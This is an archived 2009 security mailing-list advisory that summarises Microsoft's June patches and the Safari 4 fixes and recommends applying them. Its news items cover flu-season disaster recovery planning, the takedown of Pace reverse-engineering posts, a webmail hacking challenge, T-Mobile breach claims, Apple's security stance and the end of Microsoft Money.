Advisory #267 - Microsoft (Multiple), Safari, Multiple News
|
View:
New views
1 Messages
—
Rating Filter:
Alert me
|
 |
Advisory #267 - Microsoft (Multiple), Safari, Multiple News
by Sunnet Beskerming Alert mailing list
::
Rate this Message:
Sûnnet Beskerming Alert List Advisory #267
You are receiving this message because you have subscribed to our Information Security Alert Mailing List, or have been selected for a specific one-off copy. If you believe that you are receiving this message in error,pleasecontactinfo@... to resolve the error. Why not upgrade to get same day notification on security threats? Details and rates available online - (http://www.beskerming.com/premium/generic_advisory.html). Why not go the next step and get delivery tailored just for your company? (http://www.beskerming.com/premium/focussed_advisory.html) Once you've had a chance to read through this advisory, come back and answer the following question. Did you like the timeliness of the advisory? Our premium subscribers get this sort of service on every advisory - same day coverage of security discoveries and full details on all external tracking data that we have discovered, to help keep you informed and form a well-rounded opinion and assessment of the risk to you, your systems, and your data. Contents -------------------------------------------------------------------- 1. SECURITY -------------------------------------------------------------------- 1.1 Microsoft (Multiple) - Remote Hacker Automatic Control - Time Since Discovery - 2 Days 1.2 Safari (Multiple) - Remote Hacker Automatic Control - Time Since Discovery - 2 Days ======================================= /* - Remote or Local - Can it be achieved through a network or does it require physical access? - Hacker - The bad guy - Manual or Automatic - Does the vulnerability need to be manually performed, or can it be automated? - Control, Denial of Service or Data Theft - Will the hacker get control of your system / website, will they prevent you from using it, or will they steal data. */ -------------------------------------------------------------------- 2. NEWS -------------------------------------------------------------------- 2.1 Dealing With Disasters - Not Being Afraid of a Sick Pig 2.2 Pace Moves to Suppress Reverse Engineering Discussion 2.3 Challenging Security Researchers and Coming off Second-Best 2.4 Claims of T-Mobile Hack Raise More Questions Than Answers 2.5 T-Mobile Responds to Hack Claims - Nothing to See, Please Move On 2.6 Critique of Apple's Security Stance Nothing New - But Still Worthwhile 2.7 Microsoft Money Joins Encarta on the Scrapheap ===================================== 1. SECURITY 1.1 Microsoft (Multiple) - Remote Hacker Automatic Control -- Products Affected -- Windows Office Internet Explorer IIS Word -- Technical Description -- MS09-018 - Windows. Remote code execution and Denial of Service. Replaces MS08-060 and MS08-035. Critical MS09-019 - Internet Explorer cumulative Update. Multiple remote code execution vulnerabilities. Replaces MS08-014. Critical MS09-020 - IIS. Privilege Escalation. Important MS09-021 - Office. Multiple random code execution. Replaces MS-009, MS08-057, MS08-074. Critical MS09-022 - Windows. Remote code execution and others. Replaces MS07-021. Critical MS09-023 - Windows Search. Information Disclosure. Moderate MS09-024 - Works converters. Code execution. Replaces MS08-072. Critical MS09-025 - Windows Kernel. Multiple Privilege Escalation. Replaces MS09-006. Important MS09-026 - Windows. Remote code execution. Replaces MS07-058. Important MS09-027 - Word. Multiple random code execution vulnerabilities. Replaces MS08-072. Critical -- Description -- Microsoft has released ten patches for June, along with the remaining updates for MS09-017 (effectively making it eleven patches). The patches include several critical updates for Windows, a cumulative update for Internet Explorer, and a patch for a recently disclosed IIS privilege escalation vulnerability. Six patches were rated as Critical, three as Important, and the final patch as Moderate. -- Recommended Action -- All users and administrators should apply the updates at the earliest opportunity. -- Source -- http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx http://www.beskerming.com/services/176/Patch_Briefing http://store.eSellerate.net/s.asp?s=STR3448907936&Cmd=CATALOG&CategoryID=9811 -- Updates Available -- http://www.microsoft.com/technet/security/bulletin/ms09-018.mspx http://www.microsoft.com/technet/security/bulletin/ms09-019.mspx http://www.microsoft.com/technet/security/bulletin/ms09-020.mspx http://www.microsoft.com/technet/security/bulletin/ms09-021.mspx http://www.microsoft.com/technet/security/bulletin/ms09-022.mspx http://www.microsoft.com/technet/security/bulletin/ms09-023.mspx http://www.microsoft.com/technet/security/bulletin/ms09-024.mspx http://www.microsoft.com/technet/security/bulletin/ms09-025.mspx http://www.microsoft.com/technet/security/bulletin/ms09-026.mspx http://www.microsoft.com/technet/security/bulletin/ms09-027.mspx -- External Tracking Data -- Upgrade to get details -- Threat Matrix -- U O Home User 10 10 (Highly Critical) Corporate 10 10 (Highly Critical) 1.2 Safari - Remote Hacker Automatic Control -- Products Affected -- Safari 3.x Safari 4.0 Beta -- Technical Description -- CFNetwork - Multiple vulnerabilities leading to code execution or information disclosure. CoreGraphics - Multiple vulnerabilities leading to code execution. ImageIO - PNG handling flaw leading to arbitrary cod execution and denial of service. International Components for Unicode - XSS due to poor filtering of Unicode libxml - Multiple vulnerabilities leading to code execution Safari - Possible information disclosure due to poor handling of privacy related material and possible code execution. WebKit - Multiple vulnerabilities, leading to remote code execution in the worst case. -- Description -- Apple have released version 4 of their web browser, Safari, addressing numerous serious vulnerabilities across both OS X and Windows platforms. Due to the critical nature of the vulnerabilities patched, it is considered extremely important that the update is applied at the earliest possible opportunity. -- Recommended Action -- All users and administrators should apply the updates at the earliest opportunity. -- Source -- http://support.apple.com/kb/HT1222 -- Updates Available -- http://www.apple.com/support/downloads/ -- External Tracking Data -- Upgrade to get details -- Threat Matrix -- U O Home User 10 10 (Highly Critical) Corporate 10 10 (Highly Critical) ======================================= /* Threat Matrix: U - User O - Operator Harmless - 0 ----- 10 - Highly Critical */ ======================================= 2. NEWS 2.1 Dealing With Disasters - Not Being Afraid of a Sick Pig A holistic approach to Information Security takes into consideration more than just electronic assets and elements. Social engineers, for example, rely upon exploiting people to gain access to what they are after. Another non-electronic element is Disaster Recovery and all of the associated crisis management that comes with it. Winter is less than a week away for countries in the Southern Hemisphere, and along with the cold weather comes cold and flu season. Every year companies are placed under strain as whole sections of their workforce fall ill or are forced to take time off work to care for family members who are ill. This can lead to real losses of efficiency and productivity, but it is next to impossible to actually predict who is more likely to become ill, and what areas of business are going to suffer the most. This year swine flu has seen more people than ever concerned about the slightest sniffle and cough and, so far, it hasn't affected large numbers worldwide to differentiate it significantly from normal influenza. Widespread publicity and government action to help mitigate the spread of affected individuals has many hoping that it is nothing more than a scare, and will not be the next Spanish Influenza (which was also a swine flu originating from the Americas). The low percentages of people infected, compared to the overall population, seems to support this argument. With the ability for an infectious person to travel around the globe before symptoms present, the slow spread of swine flu is further reinforcement for those hoping that it is not going to be a significant problem. That has been the case up to now. With the flu season getting into full swing in the Southern Hemisphere, the doubling of swine flu cases overnight in Australia might be enough to give people some pause. Even though the total number of infected people is less than 150 (at the time of writing), the scare amongst some people is that this could be the first real sign of an exponential growth in the numbers of infected people. Others are less concerned. Whether the rate of growth is exponential or linear doesn't really matter, a range of actions are going on in the community that are going to force businesses to begin looking at maintaining operations on reduced staffing levels. Various schools have been closed (and some are now reopening), there are people and families all over the country entering into a 'stay-at-home' isolation, and there is the chance that passengers on a cruise ship in Australian waters will be all placed into isolation. If you or your workplace don't have a Disaster Recovery plan in place, then now would be a good time to look at making one. The biggest problem that this flu season presents, even if swine flu is no worse than a normal flu, is in dragging away a significant percentage of employees for a week to two weeks at a time, even if they are completely healthy. Can your business continue to operate with 10%, 20%, 30% of employees away from work? Are there any localised points of vulnerability where the loss of one or two key individuals will bring productivity to a halt? Can your business survive on limited or no turnover if all productivity is ceased? Can your healthy employees at home still carry out work remotely? If so, how secure is the interconnect with the workplace? Are you going to risk the security of your data and business to continue operations because you can't otherwise afford the productivity loss? The answers to questions such as these should form the core of your Disaster Recovery plan. Once the plan is established, you should review it regularly to ensure the recovery actions and assessed risks are still relevant. The start of flu season is as good a time as any to do so. A doubling of confirmed swine flu cases in 24 hours is significant, even with small overall numbers of infected individuals. The world will now be watching Australia to see what could be to come for the major population centres in the Northern hemisphere when winter next rolls around. If it was possible to accurately predict and plan for events taking place, then there would be no need for Disaster Recovery planning, but by being prepared for disastrous events and having a plan to recover from them it means that you and your business will survive with more resilience once normal operations are resumed (and they will be resumed more quickly). Get some benefit from the increased public awareness of swine flu and take the opportunity to get your Disaster Recovery plans sorted out before you actually need to implement them. 2.2 Pace Moves to Suppress Reverse Engineering Discussion As a follow on to our post about McAfee pulling content before it could be read by many, is a case where a company has taken steps to unpublish third party information that has already been published. The Reverse Engineering Mac OS X site was running a series of entries on reverse engineering / decompiling Pace protected OS X binaries, only now the entries have been pulled pending threat of litigation from Pace. All that had been published to that point had been exploratory posts probing possible entry points to bypass the Pace binary obfuscation and protection and recover the binaries to a point where they could be explored more readily from a better understood point of view. Efforts from Pace (specifically the InterLok application) to prevent the attaching of debuggers only drew the reverse engineers in further - taunting them with a disassembly they couldn't easily accomplish. This time around, the RSS feed of the Reverse Engineering Mac OS X site didn't provide the full posted content, so it seemed that the content posted up to that point had been lost for good - it was unlikely that it would have been replicated across other sites to any significant extent. Since the content had been online for a couple of weeks, webcrawlers had been able to index the posts and their full content is still residing in various search engine caches across the Internet. As the site's operator, fG! points out "One thing is certain, you can't acomplish security by obscurity ! You can't simply stop knowledge because these days information flows at a bigger rate than ever. Disclosure is the only way to improve products!", with the following caution for those trying to reproduce the cached but missing entries "About Pace? I'm in contact with their lawyer and I have been asked to remove all information about this. If you have mirrored the three Pace posts and code (I'm pretty sure I'm not the only one who mirrors important info right away) please do not make it publicly available. Pace will wave you with DMCA and it's not worth the trouble. Keep it for yourself, please". Is there enough interest in reverse engineering OS X to generate a Streisand Effect, or will Pace be successful in seeing this information banished from the wider Internet? 2.3 Challenging Security Researchers and Coming off Second-Best Challenging the security community to do something that you are basing a core part of your business on is always a risky move. It is something that you really need to get right the first time, or else it is going to be quite an embarrassing experience and is likely to cost reputation if news of the defeat is widespread. A new webmail provider, which has based a core component of their service offering around offering "The most secure email accounts on the planet" might have to reconsider both their claims and their approach after a $10,000 USD challenge to break into a specified email account was defeated through a series of web based With a big push of PR highlighting this challenge, it isn't going to go down well that the breach took place so quickly. Even if there were restrictive rules in place as to how the attack might be carried out, this isn't going to stop anyone who is attacking for real from using whatever means are at their disposal to access their victim's accounts. From the description of the attacks carried out, the weakness is in how the user credentials and authentication is managed once the user has logged into the system (based on the described requirement for the attacker to launch it from a valid account), and relies upon the user having scripting permitted for the attack to work (from an IDG writeup, it seems that NoScript is enough to prevent the attack from being functional). This and other Cross Site Scripting flaws allow for credentials to be stolen, and for a victim's account to be taken over completely. One of the researchers involved with the successful compromise of the targeted account has indicated that detailed information about the attack methodology will be released early next week. Depending on the nature of the attack, this could pose problems for other service providers that rely upon physically separate channels for two-factor authentication, particularly in the case where messages sent to cell phones are used as the second authentication factor (as it is with this email provider and a number of banks which use it as a selling point of the security of their services). 2.4 Claims of T-Mobile Hack Raise More Questions Than Answers Claims have been made by an unknown party that they have compromised the US cellular network carrier T-Mobile and have managed to extract all of the corporate data, including databases, confidential documents, scripts and programs from company servers and full financial data up to the present time. Issuing the public announcement over a weekend means that it is going to take some time for T-Mobile to investigate the claims and make a formal statement, but already there are elements which suggest scam, and some which suggest that the material is legitimate. Leaning towards scam is the claimed ignorance by T-Mobile's competitors when they were approached with the data the hackers claim to have. This might just be that the hackers relied upon emails to reach the competitors, and with the email address pwnmobile@... they were likely to end up in the spam bin before anyone would be able to see the material on offer. There are better ways to reach people than through unsolicited email, but there are increased risks with taking this approach. Previous cases where there have been attempts to sell company secrets, especially for major public companies, have ended with major law enforcement attention and the approached company often aiding law enforcement in stopping the attempt. With greater corporate and public awareness of data loss and theft, it is more likely in the modern environment that competitors will call law enforcement and gain positive PR than to risk prosecution and damages by purchasing their competitor's secrets. Leaning towards legitimacy are anonymous online comments from people claiming to have worked for T-Mobile in the past verifying that at least some of the details posted correlate with the systems and servers that they knew existed within the company. The other aspect which suggests legitimacy is the level of detail in the material posted, which amounts to a tabulated network description. So far, based on the table of possible servers, applications, IPs and locations, there is nothing that can be done to further verify the accuracy of the claims by this unknown group. Not enough information is available to say either way, and it is now up to T-Mobile or the group to release further information that will clarify the situation. The arguments for an actual compromise are much weaker than the arguments for it not being real and it is considered much more likely that it is a hoax. It doesn't matter which one is actually true at the moment. The very public offer for sale of the material is going to cause more harm than good for the group behind it. For the seventh largest telecommunications provider in the world (Morgan Stanley, 2008), with 32 million customers in the US alone, T-Mobile is a very large target to be taking on, and the use of an anonymising email service may not be as secure as the group thinks it is, with Safe-mail keeping their client data protected up to the point it is necessary to comply with legal requirements, something that is probably going to happen soon. It is staggering to think how much data is represented by what the hackers have claimed and how long it must have taken to exfiltrate that information from the corporate networks, if the hackers do have it, all without the awareness of T-Mobile's Information Security staff. Other claims have been made that the group responsible is the same one that claimed to have penetrated Checkpoint, extracting the full source code for VPN1. At the end of the day it could just be another bit of drama played out on the Full-Disclosure mailing list, but it could also be the first public sign of one of the most significant network breaches in recent history. 2.5 T-Mobile Responds to Hack Claims - Nothing to See, Please Move On Following on from our recent article on a claimed successful attack against the telecommunications giant, T-Mobile, it appears that the situation still remains a little murky, with reports claiming that the company has both confirmed and denied that a breach took place. Ignoring for a moment the most recent statements by T-Mobile, the original claim of a hack seemed to offer tabulated internal network data as proof of successful compromise of the company. This is the sort of information that would be easy to extract in a single file, and is something that would be expected to exist in any non-trivial network to aid administrators with keeping the network and associated systems operating smoothly. While having possession of the file reduces the need for an attacker to manually map out the network, it isn't something that many would consider overly damaging, especially if network and system security was robust. Perhaps if a company had thrown all their intrusion and detection system eggs into the basket of Network Intrusion over Host Intrusion Detection Systems (NIDS vs HIDS), then possession of this list would allow an attacker to immediately commence extremely targeted attacks against single systems, hoping to avoid triggering the NIDS (which should be triggering on the external access in the first place), but it should be triggering a properly managed HIDS. The flip side is that having an attacker in possession of a well-enumerated network map makes it simpler for them to target systems which might have an unpatched vulnerability, or which have a degraded HIDS, when their network mapping activity should have triggered on a properly managed NIDS. A blended approach, with both systems in place and properly managed isn't going to be overly threatened by an attacker having possession of a network map. All it means is that the timeline between initial contact with the network / company systems and compromise / extraction of sensitive data is compressed, reducing the available opportunity to detect, trap and stop the hack and data extraction. T-Mobile's statements seem to support this point of view, acknowledging that the information published did exist in a file (again there are conflicting reports about the validity of this statement), which has now been identified, and that an investigation is now ongoing to determine the extent and severity of any breach that took place. The downside for external observers is that T-Mobile are not obliged to make public the results of their internal investigation, and if it is confirmed that personal data was affected for customers, then it could take some time for that information to come out. If affected customers are notified individually, it may never be known just how significant any breach might have been. Truth, as it is in many cases like this, will lie somewhere between the extremes being put forward (no or minimal hack and full network access and compromise), but it is more likely to lie towards a minor network penetration and data extraction - after all, the information that was published had to come from somewhere. It is entirely possible that the information was the result of improperly disposed of hardware or a lost storage device. At the least, it put some excitement back into the old Full-Disclosure mailing list. A big welcome, by the way, to those reading this article from within T- Mobile's network. Yes, we know you're there. If you, or any of our readers would like to get in touch with us, we're always happy to discuss analysis and material beyond what is published. 2.6 Critique of Apple's Security Stance Nothing New - But Still Worthwhile Apple is a company that is notoriously secretive about their internal security processes and, although they have become more open about acknowledging the source of bugs reported to them when they fix them, they remain steadfastly tight-lipped at almost all other times when it comes to discussing security matters. That isn't to say that the company doesn't keep on top of what is going in the world outside of Apple, nor engage with researchers and Information Security companies. Despite this, many still hold the impression that Apple is stand-offish and uncaring / oblivious to the bugs in their products. For some, this point of view has tainted all dealings with the company and has seen some researchers go to publicly disclose vulnerability information before notifying Apple, whereas other vendors in the same situation would have been notified ahead of a co-ordinated or a delayed public release of vulnerability data. Articles such as this one do little to help commonly held views, especially when it is picked up and reported as Apple struggling with security, even if it isn't the complete message of the original article. Rich Mogull puts forward a reasoned, well-thought out series of arguments in the original article, but it is nothing new. Nothing that hasn't already been put forward to Apple, both publicly and privately many times before. This doesn't mean that making these arguments is worthless. It's not. As Adobe has recently shown (and Microsoft some years before that), it is possible for a large software company to change how it approaches Information Security management, patch issuing, and dealing with security-concerned consumers and Information Security researchers. Even if Apple do not change their stance based on the most recent hirings and articles published by concerned Information Security and Apple system users, continuing to highlight and publicise the importance of taking these recommended steps keeps the ideas out in the open and being turned over, ready for a time when they might be more warmly received within Apple. 2.7 Microsoft Money Joins Encarta on the Scrapheap Following their decision earlier this year to cut Encarta from their product line, Microsoft have announced that they will be ceasing production and sale of Microsoft Money (now Microsoft Money Plus) from June 30 this year. Affected products are all of the Microsoft Money family (Essentials, Plus Deluxe, Plus Premium, Plus Home & Business). Citing increasing competition from banks, brokerage firms, and websites as viable options for traditional Money customers, Microsoft stopped providing annual updates last year, and will stop all online services by January 31, 2011. Reading deeper into the linked FAQ it clearly states that Microsoft Money products can not be activated or reactivated after January 31, 2011. This means that after that date if the system running Microsoft Money is replaced, or the software is otherwise transferred to a new system, it will not and can not be activated. End users purchasing the software between now and the end of the month need to be aware that the effective life of their software could be eighteen months, and that they need to have alternate plans for handling their financial data after that date. If the system running Microsoft Money continues to operate happily beyond that point, the loss of online functionality can be largely replaced by manual updates of tax and stock quote data, but this does limit the effectiveness of the product. ======================================= Sincerely, Sûnnet Beskerming Team info@... Sûnnet Beskerming Pty. Ltd. Adelaide, Australia http://www.beskerming.com Tel: +61 (0) 410 707 444 ** Sûnnet Beskerming Pty. Ltd. ** Established in mid 2004, Sûnnet Beskerming Pty. Ltd. is the sister company to Jongsma & Jongsma Pty. Ltd., and was formed to develop and commercialise the research coming out of Jongsma & Jongsma Pty. Ltd.. Sûnnet Beskerming Pty. Ltd. is an Information Security specialist and, in conjunction with the tools developed by Jongsma & Jongsma Pty. Ltd., provides total security solutions and services, from the perimeter to internal data stores, including web application security and security testing and analysis. _______________________________________________ Alertmailinglist mailing list Alertmailinglist@... http://skiifwrald.com/mailman/listinfo/alertmailinglist_skiifwrald.com |
| Free embeddable forum powered by Nabble | Forum Help |
